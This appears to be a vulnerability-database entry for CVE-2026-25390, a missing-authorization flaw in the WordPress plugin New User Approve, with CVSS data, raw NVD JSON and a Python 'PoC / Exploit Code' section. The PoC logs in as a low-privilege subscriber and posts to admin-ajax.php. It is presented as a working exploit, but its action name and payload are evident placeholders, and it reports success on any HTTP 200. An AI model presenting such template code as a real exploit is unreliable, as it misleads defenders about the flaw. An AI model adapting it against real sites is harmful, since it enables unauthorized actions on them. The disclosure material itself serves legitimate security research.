Security Vulnerability Report
中文
CVE-2026-25390 CVSS 6.5 MEDIUM

CVE-2026-25390

Published: 2026-03-25 17:16:49
Last Modified: 2026-04-28 02:16:06

Description

Missing Authorization vulnerability in Saad Iqbal New User Approve new-user-approve allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects New User Approve: from n/a through <= 3.2.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

New User Approve <= 3.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: New User Approve < 3.2.3 - Missing Authorization PoC # Date: 2026-03-25 # Exploit Author: Security Analyst target_url = "http://target-wordpress-site.com" # Low privilege user credentials (PR:L) username = "subscriber" password = "password" session = requests.Session() # 1. Login to get auth cookie login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url + '/wp-admin/', } session.post(target_url + "/wp-login.php", data=login_data) # 2. Send request to vulnerable endpoint # Exploiting missing authorization on a sensitive action exploit_payload = { 'action': 'nua_some_sensitive_action', 'data': 'malicious_data' } response = session.post(target_url + "/wp-admin/admin-ajax.php", data=exploit_payload) if response.status_code == 200: print("[+] Exploit successful! Action performed without admin rights.") else: print("[-] Exploit failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25390", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:48.940", "lastModified": "2026-04-28T02:16:06.400", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Saad Iqbal New User Approve new-user-approve allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects New User Approve: from n/a through <= 3.2.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Saad Iqbal New User Approve new-user-approve permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a New User Approve: desde n/a hasta &lt;= 3.2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/new-user-approve/vulnerability/wordpress-new-user-approve-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}